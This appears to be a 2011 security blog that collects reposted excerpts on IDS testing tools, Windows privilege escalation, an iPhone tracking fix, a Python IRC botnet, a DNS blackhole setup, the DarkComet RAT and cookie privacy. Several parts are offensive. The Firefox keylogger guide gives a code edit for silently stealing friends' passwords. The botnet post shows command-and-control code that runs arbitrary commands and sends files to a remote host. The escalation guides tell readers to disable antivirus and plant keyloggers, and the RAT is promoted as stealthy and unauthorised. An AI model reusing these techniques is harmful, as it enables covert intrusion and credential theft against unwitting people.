Apr 30, 2011

RedWolf Security Threat Generator

The RedWolf Security Threat Generator is a security threat simulator that tests security system effectiveness. It can used to perform tactical tests of your deployed security systems.  Security systems include Firewalls, Intrusion Detection/Prevention Systems, Data Loss Prevention Tools, Access Control Systems, Logging & Security Information/Event Management, etc. Its threat generation capabilities include email, IM, malware, P2P, social networking, VoIP, DDoS, and many more. To make it look easier, the RedWolf Security Threat Generator supports the following threat generation scenarios:

Internal Scenario Categories:

  • Network Probing
  • Email Leaks
  • Instant Messaging
  • Peer to Peer
  • Protocol Tunneling/Hiding
  • Anonymizing
  • File Transfer
  • Malware Emulation
  • Honeypots
  • Social Networking
  • VOIP
External Scenario Categories:

  • Distributed Denial of Service
  • SQL Injection
  • Malware Attacks
If you want to see full detail, please go to the Source.

Source: http://www.pentestit.com/2011/04/29/redwolf-security-threat-generator/

pytbull IDS/IPS Testing Framework for Snort and Suricata

pytbull is an Intrusion Detection/Prevention System (IDS/IPS) Testing Framework for Snort and Suricata. It can be used to test the detection and blocking capabilities of an IDS/IPS, to compare IDS/IPS, to compare configuration modifications and to check/validate configurations.
The framework is shipped with about 300 tests grouped in 8 testing modules:
  1. clientSideAttacks: this module uses a reverse shell to provide the server with instructions to download remote malicious files. This module tests the ability of the IDS/IPS to protect against client-side attacks.
  2. testRules: basic rules testing. These attacks are supposed to be detected by the rules sets shipped with the IDS/IPS.
  3. badTraffic: Non RFC compliant packets are sent to the server to test how packets are processed.
  4. fragmentedPackets: various fragmented payloads are sent to server to test its ability to recompose them and detect the attacks.
  5. multipleFailedLogins: tests the ability of the server to track multiple failed logins (e.g. FTP). Makes use of custom rules on Snort and Suricata.
  6. evasionTechniques: various evasion techniques are used to check if the IDS/IPS can detect them.
  7. shellCodes: send various shellcodes to the server on port 21/tcp to test the ability of the server to detect/reject shellcodes.
  8. denialOfService: tests the ability of the IDS/IPS to protect against DoS attempts
It is easily configurable and could integrate new modules in the future. 
If you want to download it,please go to the Source.

Source: http://sourceforge.net/projects/pytbull/

Anonymous Message to Sony(Update)

After PSN was hacked and hacker public some messages about database of Sony. And now Anonymous release message about that. Please leave the comment in this post.

AnonOps Fliers-


AnonOps Facebook-


AnonOps is not attacking PSN-


AnonOps videos-


Source: http://www.youtube.com/watch?v=d2FjS-rFSwc&feature=youtu.be

Apr 29, 2011

Windows Privilege Escalation Part 2: Domain Admin Privileges

If you want to see all detail, please go to the Source.

Escalation Techniques
Using the escalation vectors listed below, penetration testers often gain unauthorized access to all kinds things like applications, systems, and everyone’s favorite–domain administrator accounts.
  1. Crack Local LM Password Hashes A long time ago, in an LAN far away, there lived a strong password stored as an LM Hash. The penetration testers of the LAN tried brute force and dictionary attacks, but it took weeks to crack the single LM password hash. The IT administrators were pleased and felt there was security across the LAN.I think that we’ve all heard that bedtime story before, and it’s less true now than ever. Using tools like Rainbow Tables, LM password hashes can be cracked in a few minutes instead of a few weeks. Tools like these allow penetration testers to quickly crack local, service, and in some cases domain accounts. Service and domain accounts can be especially helpful for the reasons below. Service Accounts
    Local service accounts are commonly installed using the same passwords across an entire environment. To make matters worse (or better, depending on your perspective), many of them allow interactive login, and in extreme cases are installed on domain controllers with Domain Admin privileges. Service accounts may seem trivial at first glance, but make sure to give them the attention they deserve; it usually pays off in the end.
  2. Impersonate Users with Pass-The-Hash Toolkit and Incognito Have you ever wanted to be someone else? Well, now you can. With local administrator rights to a system you can impersonate any logged-on user with the Pass-The-Hash Toolkit or Incognito tool. Both of the tools provide the functionality to list logged-on users and impersonate them on the network by manipulating LSA (Local Security Authority) logon sessions. In most cases this means domain user or administrator access. I know it’s exciting, but don’t forget to keep in mind that anti-virus and anti-malware products typically protect LSA sessions from manipulation, so they must be disabled before the tools can be used. Or for the more ambitious, modify the executable source code and recompile each program to avoid detection
  3. Install a Keylogger Installing key loggers on systems is a time-honored tradition practiced by hackers for generations. They can be a great vector for gathering passwords to systems, applications, and network devices. Historically, they have been pretty easy to create and conceal. However, I still recommend disabling anti-virus services, or at least creating an anti-virus exception for certain relative files types (for example, *.exe files) before installing a
  4. Install a Sniffer on the Localhost Installing a network traffic sniffer is another vector of attack that has been practiced since the dawn of the Internet. As you might expect, sniffers can also be a great vector for gathering passwords to systems, applications, and network devices. Unfortunately, this is another one that will require local administrative access. It’s needed to install the WinPcap driver used to perform promiscuous sniffing of network traffic.Typically, the only traffic sniffed on today’s networks is broadcast traffic and traffic flowing to and from the localhost. Apparently, somewhere along the line most companies figured out that using routers and switches was a better idea than daisy-chaining hubs. Even with this limitation, sniffing traffic on the right server can yield great results, especially with the popularity of unencrypted web applications that authenticate to Active Directory. There are number of great open-source and commercial sniffing tools out there.
  5. Sniff from Network Devices
    A few of the most common vectors of attack overlooked by penetration testers are routers and switches. Typically, both device types can copy network traffic and direct it anywhere on the network for sniffing. In some cases testers can even monitor and view traffic right on the device itself. Oddly enough, many companies don’t change the default passwords and SNMP strings that protect the management of such devices. Unfortunately for penetration testers, some companies only allow read access to device configurations, but have no fear. Many of the same devices will accept and reply to SNMP queries for the TFTP image paths. Most TFTP servers don’t use authentication, which means the image can be downloaded and the device passwords can be read or cracked to gain full access.
  6. Perform Man in the Middle (MITM) Attacks Ok, you caught me, I lied about only being able to sniff network traffic coming to and from the localhost. However, it was for good reason. I wanted to make the distinct point that MITM attacks are typically required to sniff network traffic flowing between remote systems on a LAN. One of the easiest ways to conduct MITM attacks is ARP spoofing. It’s a simple attack, there are lots of free tools that support it, and many companies still don’t protect against it. Explaining how ARP spoofing works will not be covered in this article, but I strongly suggest reading up on it if you are not familiar.There are a lot of ARP spoofing tools out there, but I don’t think that I’m alone is saying that Cain & Abel is a my favorite. It makes initiating an ARP spoofing attack as easy as using Notepad. In addition, it also gathers passwords for at least 20 different applications and protocols while sniffing. The fun doesn’t stop there; it also intercepts HTTPS, RDP, and FTPS communications, making it extremely valuable even against encrypted communications. In some cases MITM attacks can be more effective than all of the other escalation vectors. It can take time to sniff the right password, but on the bright side it can be done while you’re conducting other attacks – Hooray for multi-tasking!
  7. Attack Domain Controllers Directly
    If domain controllers are in scope for your penetration test, then I recommend starting there. Gaining almost any level of user access on a domain controller typically leads to domain administrator access. If SYSTEM-level access is not immediately obtained via missing patches, weak configuration, or coding issues, then (in most cases) using the other vectors of attacks listed in Parts 1 and 2 of this series should allow you to escalate your privileges.
    Remember, SYSTEM-level access on a domain controller is equivalent to domain administrator access. SYSTEM access can be easily leveraged by penetration testers to create their own domain administrator account.
  8. Online Resources Never underestimate the power of public information. Public registrars are a great place to find company contacts, business partners, IP Addresses, and company websites. All of which can lead to valuable information such as internal procedures, configuration files, patch levels and passwords. There have been many occasions when I’ve found internal installation procedures containing passwords on company websites, forums, and blogs.Once passwords have been found, use externally accessible login interfaces to gain access to systems and sensitive information.
  9. Buy Used Computer Equipment Going once, going twice, sold to the highest bidder. Sensitive information like social security numbers, credit card numbers, and account passwords are being sold every day in a neighborhood near you. Companies sell their used POS terminals, workstations, servers, and network equipment all the time. However, what many of them don’t do is take the time to securely wipe the disks. As a result, sensitive data is flying around Ebay, Craigslist, and your local auction house. I’ve personally seen POS terminals storing thousands of card numbers in clear text. Even worse, I’ve seen firewalls with configurations that allow the buyer direct VPN access to the corporate network of the company that sold the devices.
  10. Social Engineering Sometimes the easiest way to gain domain administrative privileges is to never touch a computer. If your part of the security community you already know what social engineering is, and what the common vectors are. However, this may be a new concept for some people, so I’ll provide a brief overview.In a nutshell, social engineering is the process of manipulating people into providing information or performing actions. Although there are many types of social engineering attacks, there are three primary vectors: in person, phone-based, and the most common, email phishing. At this point you may still be wondering how this is going to result in domain administrator access. So I’ve provide an example for each vector below.  
    If you want to see all detail, please go to the Source.
    Source:  http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-2-domain-admin-privileges/

Disabling iPhone Tracking ? Do it Yourself (DiT?DiY)

Another way to disabling iPhone Tracking. Full detail is in the Source.

Trying to disable the threats on non-jailbroken iPhones

A nice proposition was published by Dominic White on his blog ( http://singe.za.net/blog/archives/1029-Quick-note-on-the-iPhone-Location-Tracking-Disclosure.html ). Basically, he explains that you can take the latest backup of your iPhone, open this file to extract the unwanted "consolidated.db" file. Then if you modify it, re-insert it in the backup, and ask iTunes to do a recovery of your iPhone on this latest (modified) backup, you'll have fake data on a non jailbroken iPhone !

This is a quite good article, with technical details about how to play with the backup issues and files extractions, etc.

To quote this blog again, one limitation would then be that you would have to do all those steps regularly, in order to clean the new location data that gets written on the iPhone. What a pain..

Disabling iPhone Tracking, Do it Yourself :-)

Here is our humble solution for non-jailbroken iPhones. On such a device, we can't delete/shred the consolidated.db file. We can't add programs on the iPhone (for classical end-users) that would add security. We can't modify permissions on the file system. We can't do so many things, as it's a non-jailbroken iPhone.

So, for those who are forced to live with the file "consolidated.db" itself, TEHTRI-Security proposes to patch this Apple file, and to add some lines of hacking inside it. We found that by adding
SQL TRIGGERS inside the file itself, we can totally get rid of the tracking issues.

Our technique is quite simple: each time the iPhone tries to insert data into this (malicious?) database, "consolidated.db", we delete any entries of the tables. How can we do that, as we have no evil process running on a non-jailbroken iPhone ? As we wrote previsouly, there is a SQL Feature, well known by hackers, which is called TRIGGERS. It's a way to have an automatic action played each time a specific database event is seen.

At TEHTRI-Security, we used TRIGGERS tons of time for our penetration tests in highly sensitive environment with customers who wanted to see if automatic evil things could happen in their databases, ERP, etc. Here it's cool to see that TRIGGERS can also be used for positive things, as it might help those of you who really need to avoid privacy issues.

SQLite3 TRIGGER Patch examples:
create trigger privacy_in_WifiLocationHarvest after insert on WifiLocationHarvest begin delete from WifiLocationHarvest; end;

create trigger privacy_in_LocationHarvest after insert on LocationHarvest begin delete from LocationHarvest; end;

Of course, you could also wait the future Apple feature that will propose you to delete the cache of locations of your iPhone. But if you don't want to wait, and if you want to destroy those lines of data each time the iPhone tries to write them, then you can try our solution.

Of course, TEHTRI-Security cannot be taken responsible for anything bad that would happen because of false manipulations on your devices. Do things carefully and of course follow the laws & licences issues in your countries.

Here are the steps that can be followed:

1- Download

2- Rebuild your own consolidated.db file by applying our previous SQL file


sqlite3 consolidated.db '.read /Users/idev/iphone/tehtris-iphone-privacy.sql'

3- Deploy this new patched "consolidated.db" file containing our TRIGGER tricks that will delete anything from this database, each time the iPhone moves even the smaller finger..

Non-Jailbroken devices: use iTunes recovery as explained before (check the blog of Dominic White for the whole process).

Jailbroken devices: if you prefer our solution, that does not run a new process in the background (compared to the "untrackerd" solution) with live automatic deletion, you just have to copy the new patched consolidated.db

$ scp consolidated.db root@your-jailbroken-iphone:/private/var/root/Library/Cache/locationd/consolidated.db

We hope this tiny article will help some people seeeking for native easy solutions with standard tools, who would need a stronger level of privacy. Of course, this is just a quick article with most pointers to the needed concepts. You'll have to dig yourself if you want to build your own stuff based on our TRIGGER Patch solution.

Notice that TEHTRI-Security has landed in Singapore this week, to join the awesome SyScan 2011 event leaded by Thomas Lim in his team. Last year, at SyScan 2010, we published 13 0days, with ways to counter-attack exploit-kits (tools like Eleonore, Zeus, SpyEye..). This year, we will focus on tricks and attacks related to web clients, etc (http://www.syscan.org), smartphones, etc. There will be many other tremendous talks given by sharp speakers dealing with IT Security and smartphones (like S.Esser!).

Should be a hot week here. Do not hesitate to join us here in Singapore, especially if you want more information about privacy issues on phones, attack/defense issues, etc.

Source: http://blog.tehtri-security.com/2011/04/disabling-iphone-tracking-do-it.html

Windows Privilege Escalation Part 1: Local Administrator Privileges

 If you want full detail, please go to the Source.

The process of stealing another Windows user’s identity may seem like black magic to some people, but in reality any user who understands how Windows works can pull it off. This is the first of two blog entries giving an overview of privilege escalation techniques that prove that fact. Part 1 (this entry) discusses obtaining local SYSTEM and administrative privileges from an unprivileged user account, and Part 2 will focus on obtaining domain administrative privileges from local administrator or domain user accounts.

Escalation Techniques
Weak configurations and missing patches often lead to local user and service account access. Sometimes these accounts can be used to access sensitive information directly, but usually access to the affected systems and connected networks doesn’t stop there. Using the 10 escalation vectors listed below, penetration testers can often gain unauthorized access to databases, network devices, and other systems on the network.

  1. Clear Text Passwords Stored in Files Never underestimate the efficiency of IT administrators. In their quest to play more Halo, most administrators have automated a large number of their processes and made their systems as homogeneous as possible. Although this sounds like a dream come true, the red team isn’t the only one in the crosshairs. The scripts used to automate processes and connect to databases often include clear text user names and passwords that can be used to gain unauthorized access to systems and applications. Also, because most of their systems are built from the same image, finding a security issue on one system is like finding it on all of them.
    So, while doing penetration tests, take the time to pick the low hanging fruit. Checking local files for sensitive credentials can be one of the easiest ways to escalate privileges. Personally, I recommend using Spider 2008 for the task. It is a great open-source tool created by the folks at Cornell University that will accept custom regex and can be used to search for sensitive information on systems, shares, and websites.
  2. Clear Text Passwords Stored in the Registry The registry is a hidden treasure chest of passwords and network paths. Application developers and system administrators leverage it for all kinds of interesting things, but they don’t always use encryption when they should. So spend some time browsing for passwords and network paths that could lead to secret stashes of sensitive data. I encourage people to write their own scripts or use an automated tool to search the registry for sensitive information, but feel free to use the find function in regedit if your fingers need a little exercise.
  3. Write Access to the System32 Directory By default, unprivileged users do not have write access to the system32 directory in Windows operating systems. However, many older applications and misguided system administrators change the permissions to avoid access errors and ensure smooth operations. Unfortunately, the result of their good intentions also allows penetration testers to avoid access errors and ensure smooth privilege escalation to local SYSTEM.
    Specifically, accessibility programs such system32\sethc.exe (Sticky Keys), and system32\utilman.exe (Windows Utility Manager) can be used to gain SYSTEM level access by replacing their executables with cmd.exe. This works because Windows doesn’t perform any file integrity checks on those files prior to login. As a result, users can create a local administrator account and disable anti-virus, among many other creative possibilities.
    This is one of my favorites. I hope you enjoy it as much as I have.
  4. Write Access to the All Users Startup Folder Every user on a Windows operating system has his or her own Windows startup folder that is used to start programs just for them when they log on. As luck would have it, there is also a Windows startup folder that contains programs that run for (you guessed it) ALL users when they log on. If unprivileged users have the ability to write to that directory, they can escalate their privileges on the local system and potentially the network by placing an evil executable or script in the directory and tricking a trusting user into logging into their machine.
    If your penetration test allows for a little bit of social engineering, I recommend calling up the help desk and asking them to sign into your system in order to help with a random computer issue. The help desk team usually has the privileges to add, edit, and remove local and domain users.
  5. Insecurely Registered Executables
    When a program is installed as a Windows service or logon application, it is required to register with Windows by supplying a path to the program’s executable. If it is not registered securely, penetration testers may be able to escalate their privileges on the system by running commands under the context of the service user. Specifically, if a registered path contains spaces and is not enclosed in quotes, penetration testers may be able to execute their own program based on the registered executable path.
    Insecurely registered executables can be an easy, low-impact way to gain SYSTEM level access on a system. Although insecurely registered executables can be identified manually, I recommend using some of the automated tools available for free on the internet.
  6. Windows Services Running as SYSTEM Lots of services run as SYSTEM, but not all of them protect their files and registry keys with strong access controls. In some cases SYSTEM-level access can be obtained by overwriting files and registry keys related to SYSTEM services. For example, overwrite an executable used by a SYSTEM service with cmd.exe. If the overwrite is successful, then the next time the service calls the executable, a SYSTEM console will open. Modifying configuration files and performing DLL injection have also proven to be effective techniques.
    No super-secret tools are need for this vector of attack; Windows Explorer or a command console should do.
  7. Weak Application Configurations
    I’ve found weak application configurations during every penetration test I’ve ever done, and in many cases they can be leveraged to gain SYSTEM-level access. Even in an age of application hardening guides and industry compliance requirements, I regularly find applications like IIS and MSSQL running as SYSTEM instead of a least privilege service account.
    I recommend doing some research on the applications installed on your target systems to determine how best to leverage their configurations.
  8. Windows At Command I know this is an oldie, but it’s still worth mentioning, because oddly enough there are some environments out there running unpatched versions of WinNT and Windows 2000. So, for those who have not used this technique before, it may still be useful.
    The “AT” command is a tool that is used to schedule tasks in Windows. By default, in earlier versions of the Windows operating system the “AT” command was run as SYSTEM. As a result, users can gain access to a console with SYSTEM access when they schedule the cmd.exe as a task.
  9. Install a User-Defined Service In some cases Windows users may have excessive rights that allow them to create services on the system using the Instrsrv.exe and Srvany.exe tools that come with the Windows NT resource kit. Instsrv.exe is used to install a program as a service, and Srvany.exe is used to run the program as a service. By default, the services installed with instsrv.exe should be configured to automatically start at boot time. However, you can also use the sc.exe command to ensure that it is configured how you want it. Either way, a restart may be required depending on your existing privileges. I’ve personally seen users in the “Power Users” group with the ability to install their own services, but it may be a coincidence.
    I recommend creating a Metasploit binary that adds a local administrator to the system, and using it to create the service. It’s easy, and the new administrator account can be used to sign in via remote desktop. However, if that’s not your cup of tea, feel free to use your favorite payloads.
  10. Local and Remote Exploits Managing and distributing patches for third-party software seem to be among the greatest challenges facing IT today. This is bad news for IT, but good news for penetration testers, because it leaves vectors of attack open. Exploiting local and remote vulnerabilities can provide SYSTEM-level access with very little effort, and—with a little luck—domain administrator access. However, they can have some negative impacts on sensitive systems, like crashing them. If that is not a problem in the environment you’re working in, then more power to you. However, if you’re working with people who don’t like their systems to crash unexpectedly, then take the time to understand the exploits and avoid using the ones that have a history of negative effects.
    There are a number of great open-source and commercial toolsets available for exploiting known software vulnerabilities. However, the frontrunners seem to be Metasploit, Canvas, and Core Impact. They all have a variety of options and exploits, but I recommend using the one that fits your immediate needs and budget.

Source: http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/

A simple botnet written in Python

If you want to see all detail of this howto, please go to the Source.

How it works

It's not very complicated! I was already familiar with some of the rudiments of the IRC protocol from hacking on a simple IRC bot library. The parts that I needed to figure out were:
  • ability to track when workers came on/off-line so they could be sent jobs
  • easily pass data from operator -> workers and back again

Worker registration

The diagram below shows the process or registration that happens when a worker comes online. Workers must know beforehand the nick of the command program (or have a way of finding it out) -- they then send a private message to the command program indicating their presence. The command program acknowledges this, adds the worker's nick to the registry of available workers, and sends the worker the location of the command channel. The worker then joins the channel and is able to start executing tasks from the operator.
In the event a worker comes online and cannot reach the command program, it will keep trying every 30 seconds until it receives an acknowledgement. Additionally, every two minutes the command program pings the workers, removing any dead ones from the list.

Task execution

Tasks are initially parsed by the command program and then dispatched to workers via the command channel. The operator can specify any number of workers to set to work on a specific task. The syntax is straightforward:
!execute (<number of workers>) <command> <arguments>
Below is a diagram of the basic workflow:
Worker tasks are parsed by the worker bot and can accept any number of arbitrary arguments, which are extracted by an operator-defined regex. Here's an example of how the "run" command looks (which executes a command on the host machine):
def get_task_patterns(self):
    return (
        ('run (?P<program>.*)', self.run),
        # ... any other command patterns ...

def run(self, program):
    fh = os.popen(program)
    return fh.read()
Dead simple! Tasks can return any arbitrary text which is then parsed by the worker's task runner and sent back to the command program. At any time, the operator can request the data for a given task.

A note on security

The operator must authenticate with the command program to issue commands - the password is hardcoded in the BotnetBot. Likewise, workers will only accept commands from the command program.

Example session

Below is a sample session. First step is to authenticate with the bot:
<cleifer> !auth password
<boss1337> Success

<cleifer> !status
<boss1337> 2 workers available
<boss1337> 0 tasks have been scheduled
Execute a command on one of the workers:
<cleifer> !execute 1 run vmstat
<boss1337> Scheduled task: "run vmstat" with id 1 [1 workers]
<boss1337> Task 1 completed by 1 workers
Print the data returned by the last executed command:
<cleifer> !print
<boss1337> [workerbot:{alpha}] - run vmstat
<boss1337> procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu----
<boss1337> r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa
<boss1337> 0  0      0 352900 583696 1298868    0    0    16    31  133  172  4  2 94  0
Find open ports on the workers hosts:
<cleifer> !execute ports
<boss1337> Scheduled task: "ports" with id 2 [2 workers]
<boss1337> Task 2 completed by 2 workers
<cleifer> !print
<boss1337> [workerbot:{alpha}] - ports
<boss1337> [22, 80, 631]
<boss1337> [workerbot_346:{rho}] - ports
<boss1337> [22, 80]

Becoming a bot herder

If you'd like to try this out yourself, feel free to grab a checkout of the source, available on GitHub(Please go to the Source.). The worker is programmed with the following commands:
  • run executes the given program
  • download will download the file at the given url and save it to the host machine
  • info returns information about the host machine's operating system
  • ports does a quick port-scan of the system ports 20-1025
  • send_file streams the file on the host computer to the given host:port
  • status returns the size of the worker's task queue
Adding your own commands is really easy, though -- just add them to the tuple returned by the get_task_patterns method, which looks like this:
def get_task_patterns(self):
    return (
        ('download (?P<url>.*)', self.download),
        ('info', self.info),
        ('ports', self.ports),
        ('run (?P<program>.*)', self.run),
        ('send_file (?P<filename>[^\s]+) (?P<destination>[^\s]+)', self.send_file),
        ('status', self.status_report),

        # adding another command - this will return the system time and optionally
        # take a format parameter
        ('get_time(?: (?P<format>.+))?', self.get_time),
Now define your callback, which will perform whatever task you like and optionally return a string. The returned data will be sent to the command program and made available to the operator.
def get_time(self, format=None):
    now = datetime.datetime.now() # remember to import datetime at the top of the module
    if format:
        return now.strftime(format)
    return str(now)
Here's how you might call that command:
<cleifer> !execute get_time
<boss1337> Scheduled task: "get_time" with id 1 [1 workers]
<boss1337> Task 1 completed by 1 workers
<cleifer> !print 1
<boss1337> [workerbot:{alpha}] - get_time
<boss1337> 2011-04-21 10:41:16.251871
<cleifer> !execute get_time %H:%M
<boss1337> Scheduled task: "get_time %H:%M" with id 2 [1 workers]
<boss1337> Task 2 completed by 1 workers
<cleifer> !print
<boss1337> [workerbot:{alpha}] - get_time %H:%M
<boss1337> 10:42
The bots are extensible so you can write your own commands if you want to take up bot-herding -- this tool could be used to restart web nodes, update checkouts, report on status, anything really since it can be used to execute arbitrary commands.

Source: http://charlesleifer.com/blog/simple-botnet-written-python/

Building a DNS Blackhole with FreeBSD

If you want full article, please go to the Source.

This document will outline how to setup FreeBSD to act as a DNS Blackhole (DNSBH).

What is a DNS Blackhole and why would I want one?
A DNS blackhole (DNSBH) in its simplest form is just a box running bind that maintains a listing of malicious domains. When clients request a 'flagged' domain they will be redirected to either themselves (localhost), or to a safe local location that explains to the user why they just ended up where they did.

How to configure BIND

1) Edit
*** The IP address of this server will be
ifconfig_bge0="inet netmask"

Save and exit the file.

2) Edit /etc/hosts:
::1 localhost localhost.my.domain bhdns localhost localhost.my.domain bhdns bhdns.mydomain.ca bhdns

Save and exit the file.

3) Edit /etc/resolv.conf and add:
nameserver mydomain.ca
nameserver <upstream provider>

Save and exit the file.

4) Now take a look at /etc/namedb. The file is well documented. These are the changes/additions that you should make:

In the options section you need to add an entry to allow clients access. This fictitious install is on a 10 network so it would look like:
allow-query {; };

Next you want to set the address that the service will listen on. Use the same address you set in rc.conf:

listen-on {; };

Now you can set up a forwarder, in my case the same one used in /etc/resolv.conf:

forwarders { <upstream provider>; };

This isn't a requirement but by using a forwarder you will take advantage of a more local cache which will increase performance.
include "/etc/namedb/blackhole/spywaredomains.zones";

5) Create a folder called blackhole (same location you specified above) and fetch the zonefile:
~# mkdir /etc/namedb/blackhole
~# cd /etc/namedb/blackhole
~# fetch http://www.malwaredomains.com/files/spywaredomains.zones

This file contains entries that look like:
zone "razdrochi.ru" {type master; file "/etc/namedb/blockeddomain.hosts";};

With this loaded, any client request for
razdrochi.ru will be redirected to whatever we have set up in /etc/namedb/blockeddomain.hosts. Essentially, all we are doing is mapping all of the domains listed in that file to the same DNS (A) record.

Lets create this record now.

6) Edit /etc/namedb/blockeddomain.hosts: and start service.
; This zone will redirect all requests back to the blackhole itself.

$TTL 86400 ; one day

bhdns.mydomain.ca. bhdns.mydomain.ca. (
28800 ; refresh 8 hours
7200 ; retry 2 hours
864000 ; expire 10 days
86400 ) ; min ttl 1 day


* IN A

Note: You can redirect the request to anywhere you wish but it is worthwhile to send the user to a place that explains what just happened. If not, the user might get confused and open a vague "The Interweb is broken" helpdesk ticket.
~# /etc/rc.d/named start

For debugging (or other) reasons it might be worth it to separate named logs from the syslog catchall. To do this, edit /etc/syslogd.conf and add:
*.* /var/log/named.log

Save and exit the file and then:
~# touch /var/log/named.log
~# /etc/rc.d/syslogd restart

How to automate the update process

1) Fetches the zonefile
2) Performs a comparison with the current file, if there are no changes, exit. If there are then
3) Make note of the additions/removals
4) Put the new zonefile in place
5) Restart the service
6) Email the changes to an admin

If you want to get the script, please go to the Source.

1) Download getzones.sh:
~# cd /etc/namedb/blackhole
~# fetch http://www.pintumbler.org/getzones.sh
~# chmod +x /etc/namedb/blackhole/getzones.sh

2) Create the temp directory:
~# mkdir /etc/namedb/blackhole/work

3) Add an entry to roots crontab to run the script daily:

~# crontab -e

once the editor comes up, input the following line:
0 * * * /etc/namedb/blackhole/getzones.sh > /dev/null 2>&1

This will update the file every day at midnight.

My bash is pretty shoddy so you might want to test it out first :)
~# /etc/namedb/blackhole/getzones.sh

How to setup Apache to provide an information page

As I mentioned earlier, to avoid confusion it is a good idea to send the users to an information page. You can use any web server here, Apache is way overkill but its what I know.

1) Install Apache. You can do this however you wish, I will just use the ports tree:

~# cd /usr/ports/www/apache22; make install clean

2) Edit
/usr/local/etc/apache22/httpd.conf and make the following changes (in order of appearance):Listen
ServerAdmin atech@mydomain.ca
DocumentRoot "/usr/local/www/dnsbh"
ErrorDocument 500 /404.html
ErrorDocument 404 /404.html
ErrorDocument 402 /404.html

3) Create the web directory:
~# mkdir /usr/local/www/dnsbh
4) Create
/usr/local/www/dnsbh/index.html this will be the main landing page when folks are redirected:
<!DOCTYPE html>
<title>Your Org Name - IT services</title>
<script type="text/javascript">url = parent.window.location.href;</script>
<h3>Security Notice...</h3>

You have been redirected to this page because the website that you tried to visit has been known to harbor
or distribute Spyware, Viruses or other forms of malicious software.


As part of our Information Security Policy we maintain a listing of potentially harmful sites to assist in the protection and stability of our computing resources. This is also done to protect users from divulging personal information to third parties where it could be used for illicit purposes such as Spam or Fraud.


If you feel your access to this web site is a requirement, contact your local Information Technology Services department for assistance.

5) Create /usr/local/www/dnsbh/warn.png. This image should be around 127 X 57 pixels and contain something that identifies your organization along with something that conveys 'warning' either through words or images.

6) Create
/usr/local/www/dnsbh/404.html. This should look something like:
<!DOCTYPE html>
<a href="/index.html" target="_new"><img border="0" src="/warn.png"></a>

Monitoring examples and ideas
The examples below are simply trending connections to port 80.

The shortcomings of this solution aside, that second image is quite compelling. You don't even need an analyst to interpret it. This is the kind of stuff that can be easily offloaded because the message is so poignant.

This example shows a typical day of activity:

This shows an infection:

A nice summary table like the one below is very useful. It is important to not just focus on hits but just how much data a client trying to send out. Large payloads repeatedly sent to this device should be an instant alarm.

Keep in mind too that that this is a webserver people are connecting to. Which means: LOGS! Aside from the fact that we can use these to clarify events, the data is screaming to be mined. I am not quite there yet, but soon.


Being a little short handed at work, this was one of the first security solutions that I gravitated towards. The passiveness (and price) just made sense. A DNSBH can dramatically improve an organizations overall security posture for next to nothing. Yes, understand that It is NOT going to help you deal with intelligent threats, but you know what? that doesn't really matter because most aren't.
The sludge, the unworthy.. that is where this solution shines. If you are short on time, and short on resources, this is a gift.

Source: http://www.pintumbler.org/Code/dnsbl

DarkComet-RAT v.3.3 Released

If you want to see change log or download application, please go to the Source.

DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows machine since Windows 2000.This software allow you to make hundreds of functions stealthly and remotely without any kind of autorisation in the remote process.This software is a long time project , started the August 2008 , DarkComet-RAT is now one of the best and one of the most stable RAT ever made and totally free.

Source: http://security-sh3ll.blogspot.com/2011/04/darkcomet-rat-v33-beta-released.html

Turn Your Firefox Into A Keylogger Without Any Software !

Here we go to learn that how to turn a Mozilla Firefox into an undetectable (FUD) keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack your friends accounts, whenever they were over your house. and the most interesting things is, this full process will be done without using any kind of software !
So let's follow some few easy steps to turn our firefox into a password stealer:

1) Close Firefox

2) Navigate to:

Windows - C:/Program Files/Mozilla Firefox/Components
Mac - Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components.

3) Find The Script Named " nsLoginManagerPrompter.js"

4) Now you just need to download the following file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one I have already edited and works.

From now on, when someone logs onto any site, they username and password will be saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options... > Security Tab > click on saved passwords, then click on show passwords, and press yes!

Using Firefox 4.0:
Edit nsLoginManagerPrompter.js which is normally located in C:\Program Files\Mozilla Firefox\components\.
Replace the code from lines 800 - 869 with:
var pwmgr = this._pwmgr; pwmgr.addLogin(aLogin);
Save and replace original file.

Source: http://topone2u.blogspot.com/2011/04/turn-your-firefox-into-keylogger.html

Cookies and Your Privacy: Past, Present and Future

Cookies were first introduced to the internet as a method for web pages to remember a visitor.
They were used to store things such as passwords, user names, or the contents of an online shopping cart after a browser leaves a certain page. So when a browser returned to a page, they would not have to re-enter their password or refill their shopping cart.
Through the use of cookies, the web page would remember their previous visit and it would be like they never left the page in the first place.
However, as the internet has continued to develop so have cookies. Now they are shared amongst linked web pages to help profile users and track their movements over the world wide web.


Cookies are best described as a piece of text stored on a user’s computer by their web browser. When Lou Montulli, a well known web browser producer, first introduced cookies to the internet in 1994, they were originally intended to make the web browsing experience easier for the user by implementing a virtual shopping cart.

With the ability of a website to remember specific visitors through cookies, the site could store and remember what the visitor was shopping for. Even after leaving the site, the user could return and pick up right where they had left off, making the internet shopping experience much more user friendly.

As cookies progressed and developed further, they began to take on new tasks, such as remembering the user names and passwords of users, making signing into websites much easier.

However, as the general public became more aware of cookies throughout the late 1990’s, their downside began to surface. In 1996, cookies began to receive media attention due to their potential privacy issues.
If web sites can store information about specific users, what else are they capable of keeping tabs on? And furthermore, in what other ways is this information being used?

Strategic Planning Assumptions

-For personal use, people using the internet will have to decide what is more important to them, simplicity or privacy?

-In the near future, companies will undoubtedly make their employees use an internet browser that disables cookies. For a business, not protecting a customers personal information could lead to major legal problems. This possibility can be eliminated by disabling cookies.

-If restrictions to cookies become common place on the internet, the Internet Advertising Bureau will be forced to make major changes to the way they obtain information about internet users. This could potentially alter the entire structure of internet advertising as we know it today.


Throughout the development and advancement of cookies they have continued to take on more tasks and responsibilities. Where they were originally intended to make the web browsing experience easier, many would now question their impact on privacy.

With the different types of cookies being used by web browsers on the internet today, an individual’s personal preferences are now not only being stored, but also being shared amongst different websites.
